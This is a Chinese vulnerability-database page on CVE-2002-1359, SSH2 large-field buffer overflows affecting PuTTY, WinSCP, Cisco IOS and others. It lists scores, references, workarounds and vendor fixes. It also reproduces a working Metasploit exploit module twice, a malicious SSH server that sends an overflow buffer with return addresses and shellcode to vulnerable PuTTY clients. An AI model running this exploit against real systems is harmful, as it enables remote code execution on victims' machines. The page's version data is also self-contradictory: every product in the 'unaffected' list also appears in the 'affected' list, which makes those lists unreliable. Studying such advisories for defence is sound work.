CVE-2002-1359
CVSS10.0
发布时间 :2002-12-23 00:00:00
修订时间 :2009-03-04 00:14:08
NMCOEPS    

[原文]Multiple SSH2 servers and clients do not properly handle large packets or large fields, which may allow remote attackers to cause a denial of service or possibly execute arbitrary code via buffer overflow attacks, as demonstrated by the SSHredder SSH protocol test suite.


[CNNVD]多个SSH2服务器客户端超长字段远程缓冲区溢出漏洞(CNNVD-200212-041)

        
        SSH协议可以使客户端和服务端之间建立加密通信。Rapid7开发了SSHredde测试工具,针对连接初始化,KEY交换,SSH传输层协议密码字段协商等过程进行详细测试。
        在测试过程中发现多个SSH2服务器和客户端不正确处理非法或不正确部分字符串(如问候行,KEXINIT包中的所有字符串)长度,远程攻击者可以利用这个漏洞进行拒绝服务攻击或可能以进程权限执行任意代码。
        目前没有更详细的漏洞细节。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-20 [输入验证不恰当]

- CPE (受影响的平台与产品)

cpe:/a:putty:putty:0.49
cpe:/o:cisco:ios:12.2Cisco IOS 12.2
cpe:/o:cisco:ios:12.0sCisco IOS 12.0S
cpe:/o:cisco:ios:12.1eCisco IOS 12.1E
cpe:/o:cisco:ios:12.1eaCisco IOS 12.1EA
cpe:/o:cisco:ios:12.1tCisco IOS 12.1T
cpe:/a:winscp:winscp:2.0.0
cpe:/a:putty:putty:0.48
cpe:/o:cisco:ios:12.2sCisco IOS 12.2S
cpe:/a:fissh:ssh_client:1.0a_for_windows
cpe:/a:intersoft:securenetterm:5.4.1
cpe:/a:pragma_systems:secureshell:2.0
cpe:/a:netcomposite:shellguard_ssh:3.4.6
cpe:/o:cisco:ios:12.2tCisco IOS 12.2T
cpe:/a:putty:putty:0.53
cpe:/o:cisco:ios:12.0stCisco IOS 12.0ST

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:5848Multiple Vendors SSH2 "buffer overflow" Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1359
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1359
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-041
(官方数据源) CNNVD

- 其它链接及资源

http://www.cert.org/advisories/CA-2002-36.html
(VENDOR_ADVISORY)  CERT  CA-2002-36
http://xforce.iss.net/xforce/xfdb/10870
(UNKNOWN)  XF  ssh-transport-multiple-bo(10870)
http://www.securityfocus.com/bid/6407
(UNKNOWN)  BID  6407
http://securitytracker.com/id?1005813
(UNKNOWN)  SECTRACK  1005813
http://securitytracker.com/id?1005812
(UNKNOWN)  SECTRACK  1005812
http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0110.html
(VENDOR_ADVISORY)  VULNWATCH  20021216 R7-0009: Vulnerabilities in SSH2 Implementations from Multiple Vendors

- 漏洞信息

多个SSH2服务器客户端超长字段远程缓冲区溢出漏洞
危急 输入验证
2002-12-23 00:00:00 2009-03-04 00:00:00
远程  
        
        SSH协议可以使客户端和服务端之间建立加密通信。Rapid7开发了SSHredde测试工具,针对连接初始化,KEY交换,SSH传输层协议密码字段协商等过程进行详细测试。
        在测试过程中发现多个SSH2服务器和客户端不正确处理非法或不正确部分字符串(如问候行,KEXINIT包中的所有字符串)长度,远程攻击者可以利用这个漏洞进行拒绝服务攻击或可能以进程权限执行任意代码。
        目前没有更详细的漏洞细节。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用防火墙或其他包过滤系统限制只有可信主机和网络对SSH SERVER进行访问。
        * SSH客户端可以通过连接可信服务器来降低危险。
        厂商补丁:
        F-Secure
        --------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.f-secure.com

        InterSoft
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.securenetterm.com/

        SSH Communications Security
        ---------------------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.ssh.com/

        FiSSH
        -----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://web.mit.edu/ssh/FiSSH/

        NetComposite
        ------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://telneat.lipetsk.ru/

        Pragma Systems, Inc.
        --------------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.pragmasys.com/

        PuTTY
        -----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.chiark.greenend.org.uk/~sgtatham/putty/

        WinSCP
        ------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://winscp.vse.cz/eng/

- 漏洞信息 (16463)

PuTTy.exe <= v0.53 Buffer Overflow (EDBID:16463)
windows remote
2010-06-15 Verified
0 metasploit
N/A [点击下载]
##
# $Id: putty_msg_debug.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::TcpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PuTTy.exe <= v0.53 Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in the PuTTY SSH client that is triggered
				through a validation error in SSH.c.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9525 $',
			'References'     =>
				[
					[ 'CVE', '2002-1359' ],
					[ 'OSVDB', '8044'],
					[ 'URL', 'http://www.rapid7.com/advisories/R7-0009.html' ],
					[ 'BID', '6407'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
					'MaxNops'  => 0,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ],
					[ 'Windows XP SP2 English',   { 'Ret' => 0x76b43ae0 } ],
					[ 'Windows 2003 SP1 English', { 'Ret' => 0x76aa679b } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Dec 16 2002',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ])
			], self.class)
	end

	def on_client_connect(client)
		return if ((p = regenerate_payload(client)) == nil)

		buffer =
			"SSH-2.0-OpenSSH_3.6.1p2\r\n" +
			"\x00\x00\x4e\xec\x01\x14" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde" +
			(((((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde") * 2) +
			(((rand_text_alphanumeric(64)) + ",") * 2) + rand_text_alphanumeric(21) +
			[target.ret].pack('V') + make_nops(10) + p.encoded +
			(((rand_text_alphanumeric(64)) + ",") * 15) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +
			(((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +
			(((rand_text_alphanumeric(64)) + ",") * 21) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +
			(((((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde") * 6) +
			"\x00\x00\x00\x00\x00\x00"

		print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")

		client.put(buffer)
		handler

		service.close_client(client)
	end

end
		

- 漏洞信息 (F83008)

PuTTy.exe <= v0.53 Buffer Overflow (PacketStormID:F83008)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2002-1359
[点击下载]

This Metasploit module exploits a buffer overflow in the PuTTY SSH client that is triggered through a validation error in SSH.c.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##



class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::TcpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PuTTy.exe <= v0.53 Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the PuTTY SSH client that is triggered
				through a validation error in SSH.c.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					[ 'CVE', '2002-1359' ],
					[ 'OSVDB', '8044'],
					[ 'URL', 'http://www.rapid7.com/advisories/R7-0009.html' ],
					[ 'BID', '6407'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
					'MaxNops'  => 0,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ],
					[ 'Windows XP SP2 English',   { 'Ret' => 0x76b43ae0 } ],
					[ 'Windows 2003 SP1 English', { 'Ret' => 0x76aa679b } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'December 16 2002',
			'DefaultTarget'  => 0))

		register_options(
			[ 
				OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ])
			], self.class)
	end

	def on_client_connect(client)
		return if ((p = regenerate_payload(client)) == nil)	

		buffer =
			"SSH-2.0-OpenSSH_3.6.1p2\r\n" +
			"\x00\x00\x4e\xec\x01\x14" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde" +
			(((((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde") * 2) +
			(((rand_text_alphanumeric(64)) + ",") * 2) + rand_text_alphanumeric(21) +
			[target.ret].pack('V') + make_nops(10) + p.encoded +
			(((rand_text_alphanumeric(64)) + ",") * 15) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +
			(((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +
			(((rand_text_alphanumeric(64)) + ",") * 21) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +
			(((((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde") * 6) +
			"\x00\x00\x00\x00\x00\x00"

		print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")

		client.put(buffer)
		handler

		service.close_client(client)
	end

end
    

- 漏洞信息

8044
Multiple Vendor SSH2 Server/Client Large Field Overflows
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS, Upgrade
Exploit Public

- 漏洞描述

Multiple buffer overflows exist in multiple SSH implementations. Both servers and clients fail to validate large packets or fields resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2002-12-16 Unknow
Unknow Unknow

- 解决方案

Refer to vendor advisory for possible solutions.

- 相关参考

- 漏洞作者

- 漏洞信息

Multiple Vendor SSH2 Implementation Buffer Overflow Vulnerabilities
Boundary Condition Error 6407
Yes No
2002-12-16 12:00:00 2009-07-11 07:16:00
Discovery of this vulnerability is credited to Rapid 7, Inc.

- 受影响的程序版本

WinSCP WinSCP 2.0 .0
Simon Tatham PuTTY 0.53
Simon Tatham PuTTY 0.49
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
Simon Tatham PuTTY 0.48
Pragma Systems SecureShell 2.0
NetComposite Shellguard SSH 3.4.6
InterSoft SecureNetTerm 5.4.1
FiSSH SSH Client For Windows 1.0 A
Cisco WebNS 7.10
Cisco WebNS 7.1 0.2.06
+ Cisco CSS11000 Content Services Switch
+ Cisco CSS11050 Content Services Switch
+ Cisco CSS11150 Content Services Switch
+ Cisco CSS11501 Content Services Switch
+ Cisco CSS11503 Content Services Switch
+ Cisco CSS11506 Content Services Switch
+ Cisco CSS11800 Content Services Switch
Cisco WebNS 7.1 0.1.02
+ Cisco CSS11000 Content Services Switch
+ Cisco CSS11050 Content Services Switch
+ Cisco CSS11150 Content Services Switch
+ Cisco CSS11501 Content Services Switch
+ Cisco CSS11503 Content Services Switch
+ Cisco CSS11506 Content Services Switch
+ Cisco CSS11800 Content Services Switch
Cisco WebNS 5.20
Cisco WebNS 5.10
Cisco WebNS 5.1 0.0.10
+ Cisco CSS11000 Content Services Switch
+ Cisco CSS11050 Content Services Switch
+ Cisco CSS11150 Content Services Switch
+ Cisco CSS11501 Content Services Switch
+ Cisco CSS11503 Content Services Switch
+ Cisco CSS11506 Content Services Switch
+ Cisco CSS11800 Content Services Switch
Cisco PIX Firewall 6.2.2 .111
Cisco PIX Firewall 6.2.2
Cisco PIX Firewall 6.2.1
Cisco PIX Firewall 6.2 (2)
Cisco PIX Firewall 6.2 (1)
Cisco PIX Firewall 6.2
Cisco PIX Firewall 6.1.4
Cisco PIX Firewall 6.1.3
Cisco PIX Firewall 6.1 (4)
Cisco PIX Firewall 6.1 (3)
Cisco PIX Firewall 6.1 (2)
Cisco PIX Firewall 6.1 (1)
Cisco PIX Firewall 6.1
Cisco PIX Firewall 6.0.4
Cisco PIX Firewall 6.0.3
Cisco PIX Firewall 6.0 (4)
Cisco PIX Firewall 6.0 (2)
Cisco PIX Firewall 6.0 (1)
Cisco PIX Firewall 6.0
Cisco ONS 15600 1.3 (0)
Cisco ONS 15600 1.1 (1)
Cisco ONS 15600 1.1 (0)
Cisco ONS 15600 1.1
Cisco ONS 15600 1.0
Cisco ONS 15454SDH 4.6 (1)
Cisco ONS 15454SDH 4.6 (0)
Cisco ONS 15454SDH 4.5
Cisco ONS 15454SDH 4.1 (3)
Cisco ONS 15454SDH 4.1 (2)
Cisco ONS 15454SDH 4.1 (1)
Cisco ONS 15454SDH 4.1 (0)
Cisco ONS 15454SDH 4.0 (2)
Cisco ONS 15454SDH 4.0 (1)
Cisco ONS 15454SDH 4.0 (0)
Cisco ONS 15454SDH 4.0
Cisco ONS 15454SDH 3.4
Cisco ONS 15454SDH 3.3
Cisco ONS 15454SDH 3.2
Cisco ONS 15454SDH 3.1
Cisco ONS 15454SDH 2.3 (5)
Cisco ONS 15454E Optical Transport Platform 0
Cisco ONS 15454 Optical Transport Platform 4.14
Cisco ONS 15454 Optical Transport Platform 4.6 (1)
Cisco ONS 15454 Optical Transport Platform 4.6 (0)
Cisco ONS 15454 Optical Transport Platform 4.5
Cisco ONS 15454 Optical Transport Platform 4.1 (3)
Cisco ONS 15454 Optical Transport Platform 4.1 (2)
Cisco ONS 15454 Optical Transport Platform 4.1 (1)
Cisco ONS 15454 Optical Transport Platform 4.1 (0)
Cisco ONS 15454 Optical Transport Platform 4.1
Cisco ONS 15454 Optical Transport Platform 4.0 (2)
Cisco ONS 15454 Optical Transport Platform 4.0 (1)
Cisco ONS 15454 Optical Transport Platform 4.0
Cisco ONS 15454 Optical Transport Platform 3.4
Cisco ONS 15454 Optical Transport Platform 3.3
Cisco ONS 15454 Optical Transport Platform 3.2 .0
Cisco ONS 15454 Optical Transport Platform 3.1 .0
Cisco ONS 15454 Optical Transport Platform 3.0
Cisco ONS 15454 Optical Transport Platform 2.3 (5)
Cisco ONS 15454 IOS-Based Blades
Cisco ONS 15327 Metro Edge Optical Transport Platform
Cisco ONS 15327 4.14
Cisco ONS 15327 4.6 (1)
Cisco ONS 15327 4.6 (0)
Cisco ONS 15327 4.1 (3)
Cisco ONS 15327 4.1 (2)
Cisco ONS 15327 4.1 (1)
Cisco ONS 15327 4.1 (0)
Cisco ONS 15327 4.0 (2)
Cisco ONS 15327 4.0 (1)
Cisco ONS 15327 4.0
Cisco ONS 15327 3.4
Cisco ONS 15327 3.3
Cisco ONS 15327 3.2
Cisco ONS 15327 3.1
Cisco ONS 15327 3.0
Cisco IOS 12.2T
Cisco IOS 12.2S
Cisco IOS 12.2(1)T
Cisco IOS 12.2(1)S
Cisco IOS 12.2(1)
Cisco IOS 12.2
Cisco IOS 12.1T
Cisco IOS 12.1EA
Cisco IOS 12.1E
Cisco IOS 12.1(5a)E
Cisco IOS 12.1(1)T
Cisco IOS 12.0ST
Cisco IOS 12.0S
Cisco IOS 12.0(5)S
Cisco IOS 12.0(16)ST
Cisco Firewall Services Module (FWSM) 2.1 (0.208)
Cisco Aironet Firmware 12.0 1T
Cisco Aironet Firmware 12.0 0T
Simon Tatham PuTTY 0.53 b
Pragma Systems SecureShell 3.0
OpenSSH OpenSSH 3.5
OpenSSH OpenSSH 3.4 p1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux Enterprise Edition 1.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ FreeBSD FreeBSD 5.0
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ IBM AIX 5.1 L
+ IBM AIX 4.3.3
+ Immunix Immunix OS 7+
+ RedHat Linux 8.0
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ Slackware Linux 8.1
OpenSSH OpenSSH 3.4
OpenSSH OpenSSH 3.3 p1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
OpenSSH OpenSSH 3.3
+ Openwall Openwall GNU/*/Linux (Owl)-current
OpenSSH OpenSSH 3.2.3 p1
OpenSSH OpenSSH 3.2.2 p1
+ Apple Mac OS X 10.1.5
+ Apple Mac OS X 10.1.4
+ Apple Mac OS X 10.1.3
+ Apple Mac OS X 10.1.2
+ Apple Mac OS X 10.1.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X 10.0.4
+ Apple Mac OS X 10.0.3
+ Apple Mac OS X 10.0.2
+ Apple Mac OS X 10.0.1
+ Apple Mac OS X 10.0
OpenSSH OpenSSH 3.2
+ OpenBSD OpenBSD 3.1
OpenSSH OpenSSH 3.1 p1
+ Juniper Networks NetScreen-IDP 10 3.0 r2
+ Juniper Networks NetScreen-IDP 10 3.0 r1
+ Juniper Networks NetScreen-IDP 10 3.0
+ Juniper Networks NetScreen-IDP 100 3.0 r2
+ Juniper Networks NetScreen-IDP 100 3.0 r1
+ Juniper Networks NetScreen-IDP 100 3.0
+ Juniper Networks NetScreen-IDP 1000 3.0 r2
+ Juniper Networks NetScreen-IDP 1000 3.0 r1
+ Juniper Networks NetScreen-IDP 1000 3.0
+ Juniper Networks NetScreen-IDP 500 3.0 r2
+ Juniper Networks NetScreen-IDP 500 3.0 r1
+ Juniper Networks NetScreen-IDP 500 3.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.3
+ RedHat Linux 7.2
+ RedHat Linux 7.1
+ RedHat Linux for iSeries 7.1
+ RedHat Linux for pSeries 7.1
+ Slackware Linux 8.1
+ Sun Linux 5.0.7
+ Sun Solaris 9
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
OpenSSH OpenSSH 3.1
OpenSSH OpenSSH 3.0.2 p1
+ Guardian Digital Engarde Secure Linux 1.0.1
+ HP VirtualVault 4.6
OpenSSH OpenSSH 3.0.2
- Debian Linux 3.0
+ FreeBSD FreeBSD 4.5 -STABLEpre2002-03-07
+ FreeBSD FreeBSD 4.5 -RELEASE
+ OpenPKG OpenPKG 1.0
+ Openwall Openwall GNU/*/Linux 0.1 -stable
+ S.u.S.E. Linux 8.0
OpenSSH OpenSSH 3.0.1 p1
OpenSSH OpenSSH 3.0.1
OpenSSH OpenSSH 3.0 p1
OpenSSH OpenSSH 3.0
LSH LSH 1.5
InterSoft SecureNetTerm 5.4.2
Cisco WebNS 7.10 .0.06s
Cisco WebNS 5.20 .0.06s
Cisco PIX Firewall 6.3 (1)
Cisco PIX Firewall 6.2 (3)
Cisco PIX Firewall 6.1 (5)
Cisco PIX Firewall 6.0 (4.101)
Cisco IOS 12.2(14)S
Cisco IOS 12.2(13a)
Cisco IOS 12.2(13)T1
Cisco IOS 12.2(12b)
Cisco IOS 12.2(11)T3
Cisco IOS 12.1(14)E1
Cisco IOS 12.1(13)EA1c
Cisco IOS 12.1(13)E3
Cisco IOS 12.0(23)S2
Cisco IOS 12.0(22)S4
Cisco IOS 12.0(21)ST6
Cisco IOS 12.0(21)S6
Cisco IOS 12.0(20)ST7
Cisco Aironet Firmware 12.0 1T1
BitVise WinSSHD 3.5

- 不受影响的程序版本

Simon Tatham PuTTY 0.53 b
Pragma Systems SecureShell 3.0
OpenSSH OpenSSH 3.5
OpenSSH OpenSSH 3.4 p1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux Enterprise Edition 1.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ FreeBSD FreeBSD 5.0
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ IBM AIX 5.1 L
+ IBM AIX 4.3.3
+ Immunix Immunix OS 7+
+ RedHat Linux 8.0
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ Slackware Linux 8.1
OpenSSH OpenSSH 3.4
OpenSSH OpenSSH 3.3 p1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
OpenSSH OpenSSH 3.3
+ Openwall Openwall GNU/*/Linux (Owl)-current
OpenSSH OpenSSH 3.2.3 p1
OpenSSH OpenSSH 3.2.2 p1
+ Apple Mac OS X 10.1.5
+ Apple Mac OS X 10.1.4
+ Apple Mac OS X 10.1.3
+ Apple Mac OS X 10.1.2
+ Apple Mac OS X 10.1.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X 10.0.4
+ Apple Mac OS X 10.0.3
+ Apple Mac OS X 10.0.2
+ Apple Mac OS X 10.0.1
+ Apple Mac OS X 10.0
OpenSSH OpenSSH 3.2
+ OpenBSD OpenBSD 3.1
OpenSSH OpenSSH 3.1 p1
+ Juniper Networks NetScreen-IDP 10 3.0 r2
+ Juniper Networks NetScreen-IDP 10 3.0 r1
+ Juniper Networks NetScreen-IDP 10 3.0
+ Juniper Networks NetScreen-IDP 100 3.0 r2
+ Juniper Networks NetScreen-IDP 100 3.0 r1
+ Juniper Networks NetScreen-IDP 100 3.0
+ Juniper Networks NetScreen-IDP 1000 3.0 r2
+ Juniper Networks NetScreen-IDP 1000 3.0 r1
+ Juniper Networks NetScreen-IDP 1000 3.0
+ Juniper Networks NetScreen-IDP 500 3.0 r2
+ Juniper Networks NetScreen-IDP 500 3.0 r1
+ Juniper Networks NetScreen-IDP 500 3.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.3
+ RedHat Linux 7.2
+ RedHat Linux 7.1
+ RedHat Linux for iSeries 7.1
+ RedHat Linux for pSeries 7.1
+ Slackware Linux 8.1
+ Sun Linux 5.0.7
+ Sun Solaris 9
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
OpenSSH OpenSSH 3.1
OpenSSH OpenSSH 3.0.2 p1
+ Guardian Digital Engarde Secure Linux 1.0.1
+ HP VirtualVault 4.6
OpenSSH OpenSSH 3.0.2
- Debian Linux 3.0
+ FreeBSD FreeBSD 4.5 -STABLEpre2002-03-07
+ FreeBSD FreeBSD 4.5 -RELEASE
+ OpenPKG OpenPKG 1.0
+ Openwall Openwall GNU/*/Linux 0.1 -stable
+ S.u.S.E. Linux 8.0
OpenSSH OpenSSH 3.0.1 p1
OpenSSH OpenSSH 3.0.1
OpenSSH OpenSSH 3.0 p1
OpenSSH OpenSSH 3.0
LSH LSH 1.5
InterSoft SecureNetTerm 5.4.2
Cisco WebNS 7.10 .0.06s
Cisco WebNS 5.20 .0.06s
Cisco PIX Firewall 6.3 (1)
Cisco PIX Firewall 6.2 (3)
Cisco PIX Firewall 6.1 (5)
Cisco PIX Firewall 6.0 (4.101)
Cisco IOS 12.2(14)S
Cisco IOS 12.2(13a)
Cisco IOS 12.2(13)T1
Cisco IOS 12.2(12b)
Cisco IOS 12.2(11)T3
Cisco IOS 12.1(14)E1
Cisco IOS 12.1(13)EA1c
Cisco IOS 12.1(13)E3
Cisco IOS 12.0(23)S2
Cisco IOS 12.0(22)S4
Cisco IOS 12.0(21)ST6
Cisco IOS 12.0(21)S6
Cisco IOS 12.0(20)ST7
Cisco Aironet Firmware 12.0 1T1
BitVise WinSSHD 3.5

- 漏洞讨论

Multiple vendor SSH2 implementations are reported to be prone to buffer overflows. These buffer overflows are alleged to be exploitable prior to authentication.

These conditions were discovered during tests of the initialization, key exchange, and negotiation phases (KEX, KEXINIT) of a SSH2 transaction between client and server. These issues are known to affect various client and server implementations of the protocol.

Successful exploitation will enable remote attackers to cause execution of code in the security context of the specific server and client implementations.

Further details about this vulnerability are currently unknown. This BID will be updated as more information becomes available. This vulnerability was originally described in BugTraq ID 6397.

- 漏洞利用

The SSHredder test suite, provided by Rapid 7, is available from the following location:

http://www.rapid7.com/perl/DownloadRequest.pl?PackageChoice=666

Proof-of-concept code has been published. The following program will act as a malicious server to exploit vulnerable 'putty' clients.

- 解决方案

Cray Inc. supports an OpenSSH implementation via the Cray Open Software (COS) package. COS 3.3 will reportedly address these issues and is expected to be released at the end of December 2002. Those affected by the issues may also contact Cray Inc. to obtain a fixed version of the OpenSSH implementation that will be made available in COS 3.3.

SSH Secure Shell products do not appear to be prone to any of the vulnerabilities that have been reported.

F-Secure SSH products are not vulnerable to arbitrary code execution or denial of service attacks via exploitation of these issues.

Some versions of Cisco IOS support SSH, though it is not enabled by default. Fixed versions have been made available. See the referenced advisory for more information.

Cisco has released an updated advisory. Cisco Aironet software rebuild version 12.01T1 is not vulnerable to this issue. This software will be available in the near future and will be available for download from the Software Center.

http://www.cisco.com/tacpage/sw-center/sw-wireless.shtml

Cisco has released Content Switching Software updates. WebNS 5.20.0.06s and 7.10.0.06s address the issues. These updates can be found at the following location:

http://www.cisco.com/tacpage/sw-center/sw-content.shtml

Cisco has updated their advisory to include Cisco PIX Firewall as being vulnerable. PIX Firewall has been fixed in software versions 6.0(4.101), 6.1(5), 6.2(3) and 6.3(1).

Cisco has released an updated advisory to outline vulnerable Cisco ONS products and fixes. Please see the referenced advisory for more information.

The following vendors have provided fixes:


Cisco IOS 12.2T

Cisco IOS 12.2S

Cisco IOS 12.0ST

Cisco IOS 12.2

Cisco IOS 12.1E

Cisco IOS 12.0S

Simon Tatham PuTTY 0.49

Simon Tatham PuTTY 0.53

Pragma Systems SecureShell 2.0

InterSoft SecureNetTerm 5.4.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站